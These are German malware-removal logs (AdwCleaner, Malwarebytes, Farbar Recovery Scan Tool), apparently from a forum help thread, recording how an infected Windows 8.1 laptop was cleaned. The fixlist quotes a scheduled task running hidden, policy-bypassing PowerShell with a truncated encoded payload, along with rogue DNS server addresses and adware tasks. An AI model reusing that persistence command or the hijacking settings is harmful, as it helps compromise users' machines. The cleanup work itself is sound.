[-] Wert Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Web Companion]
[#] Wert Gelöscht : HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Windows\CurrentVersion\Run [Web Companion]
[-] Wert Gelöscht : HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Web Companion]
[-] Wert Gelöscht : HKU\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Run [Web Companion]
[-] Wert Gelöscht : HKU\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Web Companion]

***** [ Internetbrowser ] *****

*************************

:: "Tracing" Schlüssel gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Winsock Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [55641 Bytes] - [21/03/2016 23:15:16]
C:\AdwCleaner\AdwCleaner[C2].txt - [2005 Bytes] - [21/03/2016 23:37:43]
C:\AdwCleaner\AdwCleaner[C3].txt - [2192 Bytes] - [22/03/2016 00:11:43]
C:\AdwCleaner\AdwCleaner[C4].txt - [2122 Bytes] - [22/03/2016 02:07:09]
C:\AdwCleaner\AdwCleaner[C5].txt - [2617 Bytes] - [29/03/2016 18:39:37]
C:\AdwCleaner\AdwCleaner[S1].txt - [66192 Bytes] - [21/03/2016 22:54:31]
C:\AdwCleaner\AdwCleaner[S2].txt - [66455 Bytes] - [21/03/2016 23:13:26]
C:\AdwCleaner\AdwCleaner[S3].txt - [1759 Bytes] - [21/03/2016 23:32:32]
C:\AdwCleaner\AdwCleaner[S4].txt - [1951 Bytes] - [22/03/2016 00:00:41]
C:\AdwCleaner\AdwCleaner[S5].txt - [1977 Bytes] - [22/03/2016 01:47:49]
C:\AdwCleaner\AdwCleaner[S6].txt - [2842 Bytes] - [29/03/2016 18:21:02]

########## EOF - C:\AdwCleaner\AdwCleaner[C5].txt - [3130 Bytes] ##########
Code:
Malwarebytes Anti-Malware
www.malwarebytes.org

Suchlaufdatum: 29.03.2016
Suchlaufzeit: 16:50
Protokolldatei: mbam.txt
Administrator: Ja

Version: 2.2.1.1043
Malware-Datenbank: v2016.03.29.04
Rootkit-Datenbank: v2016.03.12.01
Lizenz: Testversion
Malware-Schutz: Aktiviert
Schutz vor bösartigen Websites: Aktiviert
Selbstschutz: Deaktiviert

Betriebssystem: Windows 8.1
CPU: x64
Dateisystem: NTFS
Benutzer: Denny

Suchlauftyp: Bedrohungssuchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 534654
Abgelaufene Zeit: 1 Std., 8 Min., 5 Sek.

Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 0 (keine bösartigen Elemente erkannt)
Module: 0 (keine bösartigen Elemente erkannt)
Registrierungsschlüssel: 0 (keine bösartigen Elemente erkannt)
Registrierungswerte: 0 (keine bösartigen Elemente erkannt)
Registrierungsdaten: 0 (keine bösartigen Elemente erkannt)
Ordner: 0 (keine bösartigen Elemente erkannt)
Dateien: 0 (keine bösartigen Elemente erkannt)
Physische Sektoren: 0 (keine bösartigen Elemente erkannt)

(end)
Code:
ATTFilter Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01 durchgeführt von Denny (2016-03-29 16:34:46) Run:1 Gestartet von C:\Users\Denny\Desktop Geladene Profile: Denny (Verfügbare Profile: Denny & Administrator) Start-Modus: Normal ============================================== fixlist Inhalt: ***************** closeprocesses: HKLM-x32\...\Run: [sun13] => [X] Winlogon\Notify\igfxcui: igfxdev.dll [X] HKLM\...\Policies\Explorer: [CDRAutoRun] 1 HKLM\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000 HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Policies\Explorer: [CDRAutoRun] 1 HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000 HKU\S-1-5-18\...\Policies\Explorer: [CDRAutoRun] 1 HKU\S-1-5-18\...\Policies\Explorer: [NoDriveAutoRun] 0x00000000 GroupPolicy: Beschränkung - Chrome <======= ACHTUNG CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG removeproxy: Tcpip\Parameters: [NameServer] 82.163.142.70 95.211.158.149 Tcpip\..\Interfaces\{4571CE39-7AA0-4823-8EC3-32F036C84A15}: [DhcpNameServer] 82.163.142.70 Tcpip\..\Interfaces\{F18236D5-1611-402B-B44F-1648D518953D}: [DhcpNameServer] 82.163.142.70 HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM -> {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = FF Plugin-x32: @Nero.com/KM -> C:\PROGRA~2\COMMON~1\Nero\BROWSE~1\NPBROW~1.DLL [Keine Datei] FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll [Keine Datei] FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files 
(x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll [Keine Datei] FF Plugin-x32: samsung.com/SamsungLinkPCPlugin -> C:\Program Files\Samsung\Samsung Link\utils\npSamsungLinkPCPlugin.dll [Keine Datei] FF SearchPlugin: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\searchplugins\DD1B66D4.xml [2016-03-07] FF SearchPlugin: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\DD1B66D4.xml [2016-02-19] FF HKLM\...\Firefox\Extensions: [{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}] - C:\Program Files\groover240120161838\Firefox\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}.xpi => nicht gefunden FF HKLM\...\Firefox\Extensions: [{AD00B37B-5BD6-4ED2-8964-6499F4764071}] - C:\Program Files\shopperz280120160932\Firefox\{AD00B37B-5BD6-4ED2-8964-6499F4764071}.xpi => nicht gefunden FF HKLM-x32\...\Firefox\Extensions: [{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}] - C:\Program Files\groover240120161838\Firefox\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}.xpi => nicht gefunden FF HKLM-x32\...\Firefox\Extensions: [{AD00B37B-5BD6-4ED2-8964-6499F4764071}] - C:\Program Files\shopperz280120160932\Firefox\{AD00B37B-5BD6-4ED2-8964-6499F4764071}.xpi => nicht gefunden S2 Arygnarj; "C:\Users\Denny\AppData\Roaming\FeykfeCekd\Nohlinbi.exe" -cms [X] C:\Users\Denny\AppData\Roaming\FeykfeCekd S2 Fuelf; "C:\Users\Denny\AppData\Roaming\ChnuutEjuryqh\Syyjj.exe" -cms [X] C:\Users\Denny\AppData\Roaming\ChnuutEjuryqh S3 IDriverT; "C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe" [X] 2016-03-21 22:23 - 2016-03-21 22:23 - 00000000 ____D C:\WINDOWS\system32\diee 2016-03-21 18:24 - 2016-03-21 18:24 - 00000000 ____D C:\WINDOWS\system32\ebo 2016-03-21 18:16 - 2016-03-28 23:05 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Leihjuef 2016-03-21 18:10 - 2016-03-21 18:10 - 00000000 ____D C:\WINDOWS\system32\oha 2016-03-21 17:33 - 2016-03-21 17:33 - 00000000 ____D C:\WINDOWS\system32\ahua 2016-03-09 18:41 - 2016-03-09 18:41 - 00000000 ____D 
C:\WINDOWS\system32\wof 2016-03-09 09:38 - 2016-03-09 09:38 - 00000000 ____D C:\WINDOWS\system32\wyfw 2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\tob 2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\riv 2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\baf emptytemp: Task: {13B8CF77-9E85-407D-A789-112A0DDF8A7F} - System32\Tasks\Foxvohji => C:\PROGRA~1\SHOPPE~3\Madre.bat Task: {221D435A-EA55-420E-8423-8ED93C16F2BD} - System32\Tasks\{862ADFBD-2F9C-1196-63CC-68B979092056} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAAgADsAOwAgACAAIAA7ACAAIAA7ACAAIAA7ADsAOwAgADsAIAAgACAAOwAgACAAOwA7ADsAOwA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcA (Der Dateneintrag hat 8096 mehr Zeichen). Task: {6D2FBF57-89ED-48A5-B2E0-752E571395C4} - System32\Tasks\{07238A32-598B-4B2D-8035-1479B16A3DB0} => pcalua.exe -a C:\Users\Denny\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=face Task: {767E686C-0DA9-4ED3-9F7E-C07DBE050AF0} - System32\Tasks\Siaby => C:\PROGRA~1\SHOPPE~1\Imuarb.bat C:\PROGRA~1\SHOPPE~1 C:\PROGRA~1\SHOPPE~2 C:\PROGRA~1\SHOPPE~3 C:\PROGRA~1\GROOVE~1 C:\Users\Denny\AppData\Roaming\yoursearching Task: {9DD2C156-62AC-406B-9385-CADD795FD545} - System32\Tasks\Conbyg => C:\PROGRA~1\SHOPPE~1\Jyjdhb.bat Task: {9FCAB4F1-032C-4A7C-964D-D7642FE7C9C7} - System32\Tasks\Fimgumbo => C:\PROGRA~1\GROOVE~1\Itiulgac.bat Task: {A641688E-E37E-40B4-9239-4268905DD07C} - System32\Tasks\Vuaga => C:\PROGRA~1\SHOPPE~1\Atoqbiuz.bat Task: {BE213BAE-DF95-400C-ADD4-F489EA0AEC83} - System32\Tasks\Sitnis => C:\PROGRA~1\SHOPPE~2\Qapwifa.bat FirewallRules: [{9532778B-533D-41E9-B1C9-7856FDB5133B}] => (Allow) LPort=8743 FirewallRules: [{4D6AF942-EAF0-47BB-B0F4-0359D6091F30}] => (Allow) LPort=8643 FirewallRules: [{9B59EAE9-A372-4F68-B16F-2ECAA3EA515A}] => (Allow) LPort=7676 
FirewallRules: [{A4EA84FD-B131-452D-A687-2FC8D2EB78C3}] => (Allow) LPort=7679 FirewallRules: [{15BEFA30-7102-42C0-961B-A344E9E0251A}] => (Allow) LPort=24234 FirewallRules: [{BD3B9774-3F44-4838-8A8F-6414A358A460}] => (Allow) LPort=7900 FirewallRules: [{B428C9A2-4E8F-439D-A91F-894BF3994FC5}] => (Allow) LPort=1900 cmd: dir %appdata% /a d cmd: dir "C:\Program Files" /a d ***************** Prozess erfolgreich geschlossen. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\sun13 => Wert erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui" => Schlüssel erfolgreich entfernt HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\CDRAutoRun => Wert erfolgreich entfernt HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDriveAutoRun => Wert erfolgreich entfernt HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\CDRAutoRun => Wert erfolgreich entfernt HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDriveAutoRun => Wert erfolgreich entfernt HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\CDRAutoRun => Wert erfolgreich entfernt HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDriveAutoRun => Wert erfolgreich entfernt C:\WINDOWS\system32\GroupPolicy\Machine => erfolgreich verschoben C:\WINDOWS\system32\GroupPolicy\GPT.ini => erfolgreich verschoben C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => erfolgreich verschoben "HKLM\SOFTWARE\Policies\Google" => Schlüssel erfolgreich entfernt ========= RemoveProxy: ========= "HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Policies\Microsoft\Internet Explorer" => Schlüssel erfolgreich entfernt HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => Wert erfolgreich entfernt HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet 
Settings\\ProxyServer => Wert erfolgreich entfernt HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => Wert erfolgreich entfernt HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => Wert erfolgreich entfernt HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => Wert erfolgreich entfernt HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => Wert erfolgreich entfernt ========= Ende von RemoveProxy: ========= HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer => Wert erfolgreich entfernt HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4571CE39-7AA0-4823-8EC3-32F036C84A15}\\DhcpNameServer => Wert erfolgreich entfernt HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{F18236D5-1611-402B-B44F-1648D518953D}\\DhcpNameServer => Wert erfolgreich entfernt HKU\S-1-5-21-1569062512-718196537-2772323438-1001\SOFTWARE\Policies\Microsoft\Internet Explorer => Schlüssel nicht gefunden. HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{CC865B26-C31D-4D23-B17B-96548EEF03F6}" => Schlüssel erfolgreich entfernt HKCR\CLSID\{CC865B26-C31D-4D23-B17B-96548EEF03F6} => Schlüssel nicht gefunden. HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt "HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}" => Schlüssel erfolgreich entfernt HKCR\CLSID\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} => Schlüssel nicht gefunden. 
"HKLM\Software\Wow6432Node\MozillaPlugins\@Nero.com/KM" => Schlüssel erfolgreich entfernt "HKLM\Software\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3" => Schlüssel erfolgreich entfernt "HKLM\Software\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9" => Schlüssel erfolgreich entfernt "HKLM\Software\Wow6432Node\MozillaPlugins\samsung.com/SamsungLinkPCPlugin" => Schlüssel erfolgreich entfernt C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\searchplugins\DD1B66D4.xml => erfolgreich verschoben C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\DD1B66D4.xml => erfolgreich verschoben HKLM\Software\Mozilla\Firefox\Extensions\\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF} => Wert erfolgreich entfernt HKLM\Software\Mozilla\Firefox\Extensions\\{AD00B37B-5BD6-4ED2-8964-6499F4764071} => Wert erfolgreich entfernt HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF} => Wert erfolgreich entfernt HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{AD00B37B-5BD6-4ED2-8964-6499F4764071} => Wert erfolgreich entfernt Arygnarj => Dienst erfolgreich entfernt "C:\Users\Denny\AppData\Roaming\FeykfeCekd" => nicht gefunden. Fuelf => Dienst erfolgreich entfernt "C:\Users\Denny\AppData\Roaming\ChnuutEjuryqh" => nicht gefunden. 
IDriverT => Dienst erfolgreich entfernt C:\WINDOWS\system32\diee => erfolgreich verschoben C:\WINDOWS\system32\ebo => erfolgreich verschoben C:\Users\Denny\AppData\Roaming\Leihjuef => erfolgreich verschoben C:\WINDOWS\system32\oha => erfolgreich verschoben C:\WINDOWS\system32\ahua => erfolgreich verschoben C:\WINDOWS\system32\wof => erfolgreich verschoben C:\WINDOWS\system32\wyfw => erfolgreich verschoben C:\WINDOWS\system32\tob => erfolgreich verschoben C:\WINDOWS\system32\riv => erfolgreich verschoben C:\WINDOWS\system32\baf => erfolgreich verschoben "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{13B8CF77-9E85-407D-A789-112A0DDF8A7F}" => Schlüssel erfolgreich entfernt "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{13B8CF77-9E85-407D-A789-112A0DDF8A7F}" => Schlüssel erfolgreich entfernt C:\WINDOWS\System32\Tasks\Foxvohji => erfolgreich verschoben "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Foxvohji" => Schlüssel erfolgreich entfernt "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{221D435A-EA55-420E-8423-8ED93C16F2BD}" => Schlüssel erfolgreich entfernt "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{221D435A-EA55-420E-8423-8ED93C16F2BD}" => Schlüssel erfolgreich entfernt C:\WINDOWS\System32\Tasks\{862ADFBD-2F9C-1196-63CC-68B979092056} => erfolgreich verschoben "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{862ADFBD-2F9C-1196-63CC-68B979092056}" => Schlüssel erfolgreich entfernt "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6D2FBF57-89ED-48A5-B2E0-752E571395C4}" => Schlüssel erfolgreich entfernt "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6D2FBF57-89ED-48A5-B2E0-752E571395C4}" => Schlüssel erfolgreich entfernt C:\WINDOWS\System32\Tasks\{07238A32-598B-4B2D-8035-1479B16A3DB0} => erfolgreich verschoben 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{07238A32-598B-4B2D-8035-1479B16A3DB0}" => Schlüssel erfolgreich entfernt "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{767E686C-0DA9-4ED3-9F7E-C07DBE050AF0}" => Schlüssel erfolgreich entfernt "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{767E686C-0DA9-4ED3-9F7E-C07DBE050AF0}" => Schlüssel erfolgreich entfernt C:\WINDOWS\System32\Tasks\Siaby => erfolgreich verschoben "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Siaby" => Schlüssel erfolgreich entfernt "C:\PROGRA~1\SHOPPE~1" => nicht gefunden. "C:\PROGRA~1\SHOPPE~2" => nicht gefunden. "C:\PROGRA~1\SHOPPE~3" => nicht gefunden. "C:\PROGRA~1\GROOVE~1" => nicht gefunden. "C:\Users\Denny\AppData\Roaming\yoursearching" => nicht gefunden. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9DD2C156-62AC-406B-9385-CADD795FD545}" => Schlüssel erfolgreich entfernt "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9DD2C156-62AC-406B-9385-CADD795FD545}" => Schlüssel erfolgreich entfernt C:\WINDOWS\System32\Tasks\Conbyg => erfolgreich verschoben "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Conbyg" => Schlüssel erfolgreich entfernt "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9FCAB4F1-032C-4A7C-964D-D7642FE7C9C7}" => Schlüssel erfolgreich entfernt "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9FCAB4F1-032C-4A7C-964D-D7642FE7C9C7}" => Schlüssel erfolgreich entfernt C:\WINDOWS\System32\Tasks\Fimgumbo => erfolgreich verschoben "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Fimgumbo" => Schlüssel erfolgreich entfernt "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A641688E-E37E-40B4-9239-4268905DD07C}" => Schlüssel erfolgreich entfernt "HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Schedule\TaskCache\Tasks\{A641688E-E37E-40B4-9239-4268905DD07C}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Vuaga => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Vuaga" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BE213BAE-DF95-400C-ADD4-F489EA0AEC83}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BE213BAE-DF95-400C-ADD4-F489EA0AEC83}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Sitnis => erfolgreich verschoben
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Sitnis" => Schlüssel erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9532778B-533D-41E9-B1C9-7856FDB5133B} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{4D6AF942-EAF0-47BB-B0F4-0359D6091F30} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9B59EAE9-A372-4F68-B16F-2ECAA3EA515A} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A4EA84FD-B131-452D-A687-2FC8D2EB78C3} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{15BEFA30-7102-42C0-961B-A344E9E0251A} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{BD3B9774-3F44-4838-8A8F-6414A358A460} => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B428C9A2-4E8F-439D-A91F-894BF3994FC5} => Wert erfolgreich entfernt

========= dir %appdata% /a d =========

Datenträger in Laufwerk C: ist Acer
Volumeseriennummer: 9CE1-4C4E

Verzeichnis von C:\Users\Denny\AppData\Roaming

29.03.2016 16:34 <DIR> .
29.03.2016 16:34 <DIR> ..
07.09.2013 22:29 <DIR> acer
24.12.2014 23:22 <DIR> Adobe
07.09.2013 18:10 <DIR> Atheros
21.03.2016 18:43 <DIR> Avira
29.03.2014 08:08 <DIR> com.adobe.downloadassistant.AdobeDownloadAssistant
22.03.2014 22:54 <DIR> CyberLink
10.11.2013 14:28 <DIR> EPSON
24.10.2013 12:59 <DIR> Identities
07.09.2013 18:13 <DIR> Macromedia
19.02.2015 07:16 <DIR> Microsoft
27.02.2014 18:09 <DIR> Mozilla
22.03.2014 22:41 <DIR> Nero
28.03.2014 08:36 <DIR> Nikon
16.03.2014 14:40 <DIR> SAMSUNG
0 Datei(en), 0 Bytes

Verzeichnis von C:\Users\Denny\Desktop

Datei nicht gefunden

========= Ende von CMD: =========

========= dir "C:\Program Files" /a d =========

Datenträger in Laufwerk C: ist Acer
Volumeseriennummer: 9CE1-4C4E

Verzeichnis von C:\Program Files

22.03.2016 00:39 <DIR> .
22.03.2016 00:39 <DIR> ..
10.11.2013 21:21 <DIR> Acer
29.07.2015 22:55 <DIR> Adobe
21.03.2016 23:15 <DIR> Common Files
22.03.2014 23:08 <DIR> CyberLink
22.08.2013 17:35 174 desktop.ini
24.10.2013 10:20 <DIR> EPSON
07.09.2013 23:59 <JUNCTION> Gemeinsame Dateien [C:\Program Files\Common Files]
29.07.2015 23:07 <DIR> Intel
21.03.2016 17:29 <DIR> Internet Explorer
14.10.2013 17:18 <DIR> Microsoft Office
24.10.2013 13:18 <DIR> MSBuild
24.10.2013 12:28 <DIR> Realtek
24.10.2013 13:18 <DIR> Reference Assemblies
31.10.2013 18:50 <DIR> Samsung
26.07.2012 09:22 <DIR> Uninstall Information
12.08.2015 07:55 <DIR> Windows Defender
09.03.2016 09:37 <DIR> Windows Journal
01.01.2015 16:45 <DIR> Windows Mail
01.01.2015 16:45 <DIR> Windows Media Player
01.01.2015 16:45 <DIR> Windows Multimedia Platform
24.10.2013 12:56 <DIR> Windows NT
01.01.2015 16:45 <DIR> Windows Photo Viewer
01.01.2015 16:45 <DIR> Windows Portable Devices
24.10.2013 12:42 <DIR> Windows Sidebar
21.03.2016 23:32 <DIR> WindowsApps
01.01.2015 16:44 <DIR> WindowsPowerShell
1 Datei(en), 174 Bytes

Verzeichnis von C:\Users\Denny\Desktop

Datei nicht gefunden

========= Ende von CMD: =========

EmptyTemp: => 494.5 MB temporäre Dateien entfernt.

Das System musste neu gestartet werden.

==== Ende von Fixlog 16:37:40 ====
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01 durchgeführt von Denny (2016-03-29 19:07:20) Gestartet von C:\Users\Denny\Desktop Windows 8.1 (X64) (2013-10-24 10:59:13) Start-Modus: Normal ========================================================== ==================== Konten: ============================= Administrator (S-1-5-21-1569062512-718196537-2772323438-500 - Administrator - Enabled) => C:\Users\Administrator.Schneider Denny (S-1-5-21-1569062512-718196537-2772323438-1001 - Administrator - Enabled) => C:\Users\Denny Gast (S-1-5-21-1569062512-718196537-2772323438-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1569062512-718196537-2772323438-1005 - Limited - Enabled) ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859} AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) 
Acer Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.03.3000 - Acer Incorporated) Acer Docs Office AddIn (HKLM-x32\...\{DCBF3379-246B-47E1-8173-639B63940838}) (Version: 2.04.2005 - Acer) Acer Launch Manager (HKLM\...\{C18D55BD-1EC6-466D-B763-8EEDDDA9100E}) (Version: 8.00.3003 - Acer Incorporated) Acer Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.04.3002.6 - Acer Incorporated) Acer Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.04.3003.1 - Acer Incorporated) Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.04.3004 - Acer Incorporated) Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3012 - Acer Incorporated) Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3016 - Acer Incorporated) Acer Remote Files (HKLM\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 1.02.3001 - Acer Incorporated) Acer USB Charge Manager (HKLM\...\{07E867C5-0C48-40FF-A013-DDAF4565AD47}) (Version: 2.00.3004 - Acer Incorporated) Adobe AIR 